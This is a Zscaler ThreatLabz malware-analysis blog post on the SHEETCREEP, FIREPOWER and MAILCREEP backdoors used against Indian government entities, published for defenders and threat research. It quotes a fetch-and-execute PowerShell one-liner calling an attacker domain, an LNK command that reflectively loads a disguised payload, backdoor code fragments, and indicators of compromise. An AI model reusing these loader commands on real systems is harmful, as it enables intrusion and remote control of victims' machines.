Zscaler Blog
Erhalten Sie die neuesten Zscaler Blog-Updates in Ihrem Posteingang
APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2
This is Part 2 of our two-part technical analysis on the Gopher Strike and Sheet Attack campaigns. For details on the Gopher Strike campaign, go to Part 1.
Introduction
In September 2025, Zscaler ThreatLabz uncovered three additional backdoors, SHEETCREEP, FIREPOWER, and MAILCREEP, used to power the Sheet Attack campaign. In Part 2 of this series, ThreatLabz will delve into these backdoors and analyze how threat actors are leveraging generative AI in their malware development processes.
The Sheet Attack campaign stands out for its use of Google Sheets as a command-and-control (C2) channel, an uncommon tactic in this region. Between November 2025 and January 2026, ThreatLabz observed the deployment of new tools, including SHEETCREEP and FIREPOWER, along with MAILCREEP, which is used to manipulate emails, and a PowerShell-based document stealer to exfiltrate files. Furthermore, the activity contained indicators suggesting that the threat actors have adopted AI as part of their malware development workflow, mirroring a global trend of AI adoption by malicious actors.
Key Takeaways
- The Sheet Attack campaign leveraged PDFs to deploy lightweight backdoors that utilized multiple C2 channels that abused legitimate cloud services from Google and Microsoft, enabling the network traffic to blend in and evade security controls.
- ThreatLabz identified SHEETCREEP, FIREPOWER, and MAILCREEP as backdoors employed in the Sheet Attack campaign.
- SHEETCREEP is a lightweight backdoor written in C# that uses Google Sheets for C2 communication.
- FIREPOWER is a PowerShell-based backdoor that abuses Google’s Firebase Realtime Database for its C2 channel.
- MAILCREEP is a Golang-based backdoor leveraging the Microsoft Graph API for its C2 communications.
- ThreatLabz identified several high-confidence fingerprints within the malware of the Sheet Attack and Gopher Strike campaigns that strongly suggest the use of generative AI.
- ThreatLabz assesses with medium confidence that these campaigns likely originate from a new subgroup or a parallel Pakistan-linked group, despite sharing similarities with the APT36 threat group.
Technical Analysis
In the following sections, ThreatLabz provides a technical analysis of the Sheet Attack campaign, detailing the backdoors it leverages and examining the evidence that suggests AI was used to generate parts of the code.
Initial infection vectors
Similar to the Gopher Strike campaign, some of the initial Sheet Attack campaigns began with the delivery of a PDF file. The PDF displayed a redacted document that tricked the recipient into clicking a Download Document button to access the full content, as shown in the figure below.

Figure 1: Example of a PDF file used in the Sheet Attack campaign.
After clicking the button, the user was directed to a threat actor-controlled website that served a ZIP archive. Similar to the Gopher Strike campaign, the server employed geographic and User-Agent checks to ensure the ZIP archive was only delivered to Windows systems in India, returning a “403 Forbidden” error otherwise. These ZIP archives contained the SHEETCREEP backdoor. The figure below illustrates the attack flow of the PDF-based Sheet Attack campaign to distribute SHEETCREEP.
.png)
Figure 2: The attack flow of the Sheet Attack campaign to distribute SHEETCREEP.
More recent Sheet Attack campaigns have transitioned to using malicious LNK files to distribute another backdoor named FIREPOWER. These LNK files execute commands such as: --headless powershell -e [base64 powershell command] to execute a PowerShell script retrieved from a threat actor-controlled C2 server (e.g., irm https://hcidoc[.]in/[path] | iex).
The figure below illustrates the attack flow of the Sheet Attack campaigns when malicious LNK files were used as the initial infection vector for FIREPOWER.
.png)
Figure 3: The attack flow of the Sheet Attack campaigns when malicious LNK files were used as the initial infection vector for FIREPOWER.
SHEETCREEP backdoor
The ZIP archive contains the following two components:
- a binary disguised with a PNG extension (
details.png) - a malicious LNK file containing the following command:
powershell.exe -WindowStyle Hidden -Command "$b=[IO.File]::ReadAllBytes('details.png');([System.Reflection.Assembly]::Load([byte[]]($b[($b.Length-1)..0])).GetType(\"Task10.Program\")::MB())"This command reverses the bytes in details.png and loads them as a .NET assembly via reflection. The Task10.Program::MB() method is executed, which drops the backdoor to disk at C:\Users\Public\Documents\details.png, as well as a loader (GServices.vbs), which is registered as a scheduled task. The GServices.vbs loader uses Powershell and reflection to load the backdoor, SHEETCREEP, which is a small C#-based backdoor with limited built-in functionality. Upon execution, SHEETCREEP performs the following actions:
- Decrypts and loads an embedded configuration using TripleDES (ECB). The configuration is a JSON dictionary consisting of Google Cloud credentials and a Google Sheet ID.
- Generates a victim ID in the format:
. Interestingly, the code that generates the victim ID contains functionality to retrieve the victim’s MAC address, but the MAC address retrieved is never used.== - The victim ID is used to create a spreadsheet within the Google Sheets workbook. If this fails, the SHEETCREEP backdoor retries, using backup configurations from a Firebase URL and a Google Cloud Storage URL. After successfully creating a spreadsheet, the SHEETCREEP backdoor retrieves the contents of cells A1 through A300 and finds the next available empty row.
- A hidden
cmd.exeprocess is also created in the background, with its standard input, output, and error streams redirected to the SHEETCREEP backdoor. - SHEETCREEP then polls the spreadsheet every three seconds for new commands, which will be encrypted using the same TripleDES key. These commands are executed using the hidden
cmd.exeprocess in step 4 above. The output of these commands is encrypted and Base64-encoded, and written to column B of the row where the command was retrieved. The workflow of this function is illustrated in the figure below.

Figure 4: Decoded and redacted example of a Google Sheet used by SHEETCREEP.
FIREPOWER backdoor
FIREPOWER is a backdoor written in PowerShell. ThreatLabz observed that several variants of the FIREPOWER backdoor were delivered in the Sheet Attack campaign. However, at its core, the backdoor performs the following actions.
FIREPOWER generates a victim identifier in the format: ComputerName==Username and connects to a Firebase Realtime Database. Then, FIREPOWER creates default keys for each victim in the data, such as:
db.baseDirectory.[victim id] = {“status”: false, “eStatus”: false, “comStatus”: false, “extension”: false, “url”: “https://”, “command”: “”, “LastHit”: “”}The table below shows the functionality of each key in the database.
Key | Description |
|---|---|
status | If set to |
eStatus | If set to |
comStatus | If set to |
extension | A string specifying the extension of the file downloaded from the URL specified in the URL key. |
url | The URL to download a file. |
command | The command to be executed using Powershell’s Invoke-Expression. |
LastHit | Contains a timestamp which is updated each time FIREPOWER queries the Firebase Realtime Database. |
Table 1: Functionality of the keys used by FIREPOWER.
FIREPOWER retrieves the names of directories within C:\Program Files and C:\Program Files (x86). In addition, it retrieves file and directory names from the victim’s Desktop and Downloads directories. Then, FIREPOWER uploads the list of file and directories to the Firebase Realtime Database in the following manner:
db.baseDirectory.[victim id] = {“Desktop”: [...], “Downloads”: [...], “Program Files”: [...], “Program Files (x86)”: [...]}FIREPOWER operates within a C2 loop with a polling interval of 300 seconds, enabling it to execute a variety of tasks. It then checks status flags and, if required, downloads a file from db.baseDirectory.[victim id].url using the hardcoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64). In addition, FIREPOWER checks the comStatus flags and, if required, will call Invoke-Expression to execute a command stored in db.baseDirectory.[victim id].command. The results of that command are appended to C:\Users\Public\Documents\text.log. Then, FIREPOWER updates the last ping back time in db.baseDirectory.[victim id].LastHit.
The table below lists some functionalities present in other variants of FIREPOWER.
Functionality | Description |
|---|---|
Persistence | An additional stub was added to create a scheduled task. This task runs a command identical to the one in the LNK file, retrieving and executing the latest FIREPOWER backdoor each time a user logs into the machine. |
Collection of command output | A new |
Testing | Message box pop-ups were added, likely to simplify debugging during testing. |
Faster polling | The polling interval was reduced to 120 seconds. |
Lure documents | A Base64-encoded PDF file was embedded in the PowerShell script to display to the user on the first run. |
Clean up | Code was added to delete the original LNK file. |
Reduced footprint | The command output log ( |
Table 2: List of features present in FIREPOWER variants.
Second-stage payloads
During the Sheet Attack campaign, ThreatLabz observed the threat actor deploying additional payloads to selected targets via FIREPOWER. As of this writing, the campaign remains active, with the threat actor introducing new backdoors written in various programming languages and utilizing different legitimate cloud services for C2. Some of those additional payloads include:
- The threat actor deployed a PowerShell-based document stealer to selected targets, scanning the target’s Desktop, Documents and OneDrive directories for files with specific extensions (.txt, .csv, .pdf, .docx, .xlsx, .pptx). The threat actor proceeded to upload those files to a threat actor-controlled private GitHub repository.
- The threat actor was also observed utilizing MAILCREEP, a backdoor developed in Golang. To check for internet connectivity, MAILCREEP establishes a TCP connection to Google's public DNS server (8.8.8.8) on port 53. If successful, MAILCREEP proceeds to its main loop. It leverages Microsoft's Graph API to manipulate emails and folders for C2 activity within a threat actor-controlled Azure tenant. For each victim, MAILCREEP creates a folder in the mailbox using the victim's identifier (formatted as
[username]-[random number]). Subsequently, it polls the mailbox for emails with subjects starting with “Input.” If such emails are found, MAILCREEP extracts their contents, decodes them using Base64, and decrypts them with AES-256 in CBC mode. The resulting string is parsed as comma-separated values (CSV), and commands are executed usingcmd.exe /c [command].
Use of generative AI for malware development
During the decompilation of the SHEETCREEP backdoor, ThreatLabz identified the use of emojis within its error-handling code. This unusual coding style strongly suggests that generative AI tools were utilized during the malware's development, which is a worldwide trend as documented by Google and OpenAI. An example is shown below:
catch (ArgumentNullException ex)
{
Console.WriteLine("❌ Config is missing required values: " + ex.Message);
sheetsService = null;
}
catch (InvalidOperationException ex2)
{
Console.WriteLine("❌ Private key format is invalid: " + ex2.Message);
sheetsService = null;
}
catch (Exception ex3)
{
Console.WriteLine("❌ Unexpected error while creating credentials: " + ex3.Message);
sheetsService = null;
}Additionally, ThreatLabz observed that the FIREPOWER backdoor contains verbose comments, including some with non-ASCII characters like Unicode arrows, as shown in the example below.
function Get-FolderContents {
param ($path)
try {
Get-ChildItem -Path $path -ErrorAction SilentlyContinue |
ForEach-Object { $_.Name } # ← SINGLE FIX: return only strings
}
catch { @() }
}
function Upload-FolderStructure {
param($systemName)
try {
$desktopPath = [Environment]::GetFolderPath("Desktop")
$downloadsPath = Join-Path $env:USERPROFILE "Downloads" # ← FIXED
// ...
}
// ...
}
// ...
# 3) If fileName still missing or trivial (like "t"), try to infer extension from Content-Type
if (-not $fileName -or $fileName.Length -lt 2 -or -not ([System.IO.Path]::GetExtension($fileName))) {
# if we have a name but no extension, keep the name and possibly add extension inferred below
$baseName = $null
if ($fileName) { $baseName = [System.IO.Path]::GetFileNameWithoutExtension($fileName) }
else { $baseName = "download_$((Get-Date).ToString('yyyyMMdd_HHmmss'))" }
# Try infer from content-type
$contentType = $http.ContentType
$inferredExt = Infer-ExtensionFromContentType -contentType $contentType
# If eStatus=true and customExt provided -> force customExt
if ($eStatus -and -not [string]::IsNullOrWhiteSpace($customExt)) {
if (-not $customExt.StartsWith(".")) { $customExt = "." + $customExt }
$fileName = $baseName + $customExt
} else {
# If inferred ext exists -> use it, else keep whatever we had, or .bin fallback
if ($inferredExt) { $fileName = $baseName + $inferredExt }
else {
# If original url path gave a filename without ext, keep it (option A wants to keep server extension when available)
if ($fileName -and ([System.IO.Path]::GetExtension($fileName))) {
# keep as-is
} else {
$fileName = $baseName + ".bin"
}
}
}This further reinforces the likelihood that generative AI tools were used in the development process. As noted in a previous blog, verbose comments designed to assist the developer during development are a hallmark of AI-generated code.
However, typos within the FIREPOWER script also indicate that the backdoor's creation was likely not purely automated and involved some degree of manual development effort, as shown in the figure below.

Figure 5: Example typo (“extention”) found in the FIREPOWER script.
Hands-on-keyboard activity
While monitoring these Google Sheet C2 channels, ThreatLabz observed repeated commands, often accompanied by typos. This strongly suggests hands-on-keyboard activity from an operator. The figure below highlights some of the typos in the commands.

Figure 6: Typos in commands indicating hands-on-keyboard activity by the Sheet Attack operator.
Threat Attribution
ThreatLabz assesses with medium confidence that the Gopher Strike and Sheet Attack campaigns were carried out by either a new Pakistan-linked APT group or a new sub-group of APT36, based on the following factors.
APT36 links
- Victimology: The campaigns predominantly target Indian government entities, which is consistent with APT36’s historical victimology. APT36 has a well-documented history of heavily targeting Indian government institutions.
- Tooling: There is a partial toolset overlap in these campaigns with APT36’s known tactics. This includes the use of Golang-based malware, consistent with APT36 examples such as DeskRAT and GoStealer, as well as the use of PowerShell scripts, which align with APT36’s observed development practices.
- Infrastructure: The Google Sheets C2 and the threat actor's private GitHub commit logs both indicate the Asia/Karachi time zone, suggesting a Pakistan-based operator.
- Techniques: The campaigns demonstrate abuse of legitimate cloud services for C2, a tactic that has been previously documented in APT36 operations. ThreatLabz observed similar behavior during the Operation FlightNight campaign and our ElizaRAT research, both of which highlighted APT36’s reliance on cloud-based services for C2 infrastructure.
- Phishing lures: The PDFs used in these campaigns closely mimic APT36's prior tactics, displaying similar themes and designs. These include the use of logos, prominent Download Document buttons, and the inclusion of a single blurred image used as part of the lure. For example, the PDFs from the Sheet Attack campaign share striking similarities with PDFs used by APT36 in a campaign conducted in April 2025, as shown in the figure below.

Figure 7: Comparison of a PDF lure used in the Sheet Attack campaign and one used in an APT36 attack from April 2025.
APT36 differences
- Techniques: The Gopher Strike and Sheet Attack campaigns use evasion techniques that have not been previously associated with APT36. These include server-side Geo-IP filtering and filtering on specific keywords within
User-Agentstrings. - Tooling: There are differences in tooling that set these campaigns apart from APT36’s typical operations. During the same timeframe, APT36 was observed targeting Linux and Windows systems using malicious .desktop files, HTA files, and CurlBack RAT. None of these were present in the Gopher Strike or Sheet Attack campaigns. Furthermore, analysis of PDF metadata reveals differences in the tools used for lure generation. For instance, comparisons of metadata between PDFs generated by APT36 in July 2025 and those used in the Sheet Attack campaign show clear discrepancies, as illustrated in the comparison figure below.

Figure 8: Comparison of Gopher Strike PDF metadata to PDF metadata from a known APT36 campaign.
The diamond model below outlines the key attributes of the Gopher Strike and Sheet Attack campaigns.

Figure 9: Diamond model highlighting key attributes of the Gopher Strike and Sheet Attack campaigns.
Conclusion
The Sheet Attack campaign targets Indian government entities by abusing legitimate internet services like GitHub accounts, Google Firebase, Google Sheets, and Microsoft’s Graph API to blend in with legitimate traffic, similar to the Gopher Strike campaign detailed in Part 1. While both campaigns share TTPs with APT36, their concurrent operation alongside traditional APT36 activity, use of new tools, and potential generative AI in malware development suggest an evolution of APT36 or the emergence of a closely aligned group.
Zscaler Coverage
Zscaler’s multilayered cloud security platform detects indicators related to the targeted attacks mentioned in this blog at various levels with the following threat names:
Indicators Of Compromise (IOCs)
File indicators
Hashes | Filename | Description |
|---|---|---|
| details.png | SHEETCREEP |
| GServices.vbs | Loader |
| details.png | The reversed Portable Executable (PE) file has been reconstructed to form the proper Dropper .NET binary. |
| AttachmentLetter.LNK | Dropper LNK launcher |
| Document.zip | Archive containing the SHEETCREEP payload. |
| Pay.pdf | Phishing PDF |
| Proof.png | SHEETCREEP |
| chrome.exe | SHEETCREEP Dropper launcher |
| edge.exe | SHEETCREEP |
| N/A | FIREPOWER |
| N/A | FIREPOWER |
| N/A | FIREPOWER |
| N/A | FIREPOWER |
| N/A | FIREPOWER |
| N/A | FIREPOWER |
| N/A | FIREPOWER |
| N/A | PowerShell document stealer |
| detail.png | SHEETCREEP |
| d.exe | SHEETCREEP and MAILCREEP Dropper launcher |
| ds.png | MAILCREEP |
Network indicators
Type | Indicator |
|---|---|
SHEETCREEP backup configuration URL | hxxps[:]//testfirebase-b24a8-default-rtdb.firebaseio[.]com/(12336)005056C0000186/details.json |
SHEETCREEP backup configuration URL | hxxps[:]//storage.googleapis.com/testfirebase-b24a8.appspot[.]com/config1.txt |
Download URL and SHEETCREEP payload | hxxps[:]//hciaccounts[.]in/Documents.zip |
C2 URL | hxxps[:]//docs.google[.]com/spreadsheets/d/1wgx4gj3-YGGAwmtr1DRu4n1QkznK2pYoKO6C4GTmquY/edit |
C2 URL | hxxps[:]//docs.google[.]com/spreadsheets/d/1cB8jzFpQcixridoEz_eDvLnjCTx79gKFQSoFiuOErdM/edit |
C2 URL | hxxps[:]//docs.google[.]com/spreadsheets/d/1wgx4gj3-YGGAwmtr1DRu4n1QkznK2pYoKO6C4GTmquY/edit |
C2 URL | hxxps[:]//docs.google[.]com/spreadsheets/d/1cdSJvZ7tx6CPBuEa66uTVWmSD4zABnZOLjM87pRXkTE/edit |
Download IP address (hciaccounts[.]in) | 15.207.85[.]170 |
FIREPOWER C2 domain | https://webdevurl-cc389-default-rtdb.firebaseio[.]com |
FIREPOWER C2 domain | https://govs-services-in-default-rtdb.firebaseio[.]com |
FIREPOWER C2 domain | https://gov-service-in-default-rtdb.firebaseio[.]com |
Payload-hosting domain | hciaccounts[.]in |
Payload-hosting domain | hcisupport[.]in |
Payload-hosting domain | hcidelhi[.]in |
Payload-hosting domain | hcidoc[.]in |
Payload-hosting domain | coadelhi[.]in |
MITRE ATT&CK Framework
ID | Tactic, Technique | Description |
|---|---|---|
T1583.001 | Resource Development, Acquire Infrastructure: Domains |
|
T1583.006 | Resource Development, Acquire Infrastructure: Web Services | The threat actor used Google Sheets as a C2 channel, and also used a Firebase URL and Google Cloud Storage URL to host backup configurations. |
T1585.003 | Resource Development, Establish Accounts: Cloud Accounts | The threat actor created Google accounts to use Google Sheets for C2 and Firebase/Google Cloud Storage for backup configurations. |
T1587.001 | Resource Development, Develop Capabilities: Malware | The threat actor developed custom malware such as the SHEETCREEP .NET backdoor. |
T1588.007 | Resource Development, Obtain Capabilities: Artificial Intelligence | The threat actor used generative AI tools during the development of the SHEETCREEP backdoor, as suggested by the use of emojis in its error-handling code. |
T1608.001 | Resource Development, Stage Capabilities: Upload Malware | The threat actor staged the initial payload by uploading a ZIP archive ( |
T1566.002 | Initial Access, Phishing: Spearphishing Link | The threat actor used phishing PDFs which contained a ‘Download Document’ button that linked to a malicious ZIP archive. |
T1059.001 | Execution, Command and Scripting Interpreter: PowerShell | Amalicious LNK file executed a PowerShell command to read a file named details.png, reverse its bytes, and load it as a .NET assembly. |
T1059.003 | Execution, Command and Scripting Interpreter: Windows Command Shell | The SHEETCREEP backdoor executes commands using a hidden |
T1129 | Execution, Shared Modules | The threat actor used a PowerShell command to load a malicious .NET DLL using |
T1204.001 | Execution, User Execution: Malicious Link | The Sheet Attack campaign required a user to click a ‘Download Document’ button to download a malicious ZIP archive. |
T1204.002 | Execution, User Execution: Malicious File | The victim was required to execute a malicious LNK file to initiate the infection chain. |
T1053.005 | Persistence, Scheduled Task/Job: Scheduled Task | The initial payload dropped a loader script, |
T1140 | Defense Evasion, Deobfuscate/Decode Files or Information | The initial LNK file reverses bytes to restore and load a .NET assembly. The SHEETCREEP backdoor uses TripleDES to encrypt its configuration. |
T1564.003 | Defense Evasion, Hide Artifacts: Hidden Window | The malicious LNK file uses the command The SHEETCREEP backdoor creates a hidden |
T1036.008 | Defense Evasion, Masquerading: Masquerade File Type | The initial payload is a .NET binary disguised with a PNG extension. |
T1620 | Defense Evasion, Reflective Code Loading | A malicious LNK file used |
T1027.013 | Defense Evasion, Obfuscated Files or Information: Encrypted/Encoded File | The SHEETCREEP backdoor uses TripleDES to encrypt its configuration. |
T1027.015 | Defense Evasion, Obfuscated Files or Information: Compression | The initial payload was delivered as a ZIP archive, |
T1033 | Discovery, System Owner/User Discovery | The threat actor executed the |
T1087.002 | Discovery, Account Discovery: Domain Account | The SHEETCREEP backdoor discovered the victim's domain and username to generate a victim ID in the format |
T1530 | Collection, Data from Cloud Storage | The SHEETCREEP backdoor contains code to retrieve backup configurations from a Firebase URL and a Google Cloud Storage URL. |
T1560.002 | Collection, Archive Collected Data: Archive via Library | The SHEETCREEP backdoor encrypts the output of executed commands using the TripleDES implementation from .NET’s System.Security.Cryptography library. |
T1071.001 | Command and Control, Application Layer Protocol: Web Protocols | The SHEETCREEP backdoor uses the Google Sheets API over HTTPS for its C2. |
T1102.001 | Command and Control, Web Service: Dead Drop Resolver | The SHEETCREEP backdoor retrieved its C2 configuration from backups hosted on legitimate web services, such as Firebase and Google Cloud Storage. |
T1102.002 | Command and Control, Web Service: Bidirectional Communication | The SHEETCREEP backdoor uses Google Sheet as a bidirectional C2 channel. |
T1573.001 | Command and Control, Encrypted Channel: Symmetric Cryptography | The SHEETCREEP backdoor used TripleDES to encrypt its configuration, as well as commands sent and received from its C2. |
T1132.001 | Command and Control, Data Encoding: Standard Encoding | The SHEETCREEP backdoor Base64-encoded the encrypted output from executed commands before writing the data to its Google Sheets C2. |
T1665 | Command and Control, Hide Infrastructure | The server hosting the malicious payloads would only respond to requests originating from IP addresses in India and having a |
T1008 | Command and Control, Fallback Channels | The SHEETCREEP backdoor was designed to use backup configurations from a Firebase URL and a Google Cloud Storage URL if the primary C2 configuration fails. |
War dieser Beitrag nützlich?
Haftungsausschluss: Dieser Blog-Beitrag wurde von Zscaler ausschließlich zu Informationszwecken erstellt und wird ohne jegliche Garantie für Richtigkeit, Vollständigkeit oder Zuverlässigkeit zur Verfügung gestellt. Zscaler übernimmt keine Verantwortung für etwaige Fehler oder Auslassungen oder für Handlungen, die auf der Grundlage der bereitgestellten Informationen vorgenommen werden. Alle in diesem Blog-Beitrag verlinkten Websites oder Ressourcen Dritter werden nur zu Ihrer Information zur Verfügung gestellt, und Zscaler ist nicht für deren Inhalte oder Datenschutzmaßnahmen verantwortlich. Alle Inhalte können ohne vorherige Ankündigung geändert werden. Mit dem Zugriff auf diesen Blog-Beitrag erklären Sie sich mit diesen Bedingungen einverstanden und nehmen zur Kenntnis, dass es in Ihrer Verantwortung liegt, die Informationen zu überprüfen und in einer Ihren Bedürfnissen angemessenen Weise zu nutzen.
Erhalten Sie die neuesten Zscaler Blog-Updates in Ihrem Posteingang
Mit dem Absenden des Formulars stimmen Sie unserer Datenschutzrichtlinie zu.



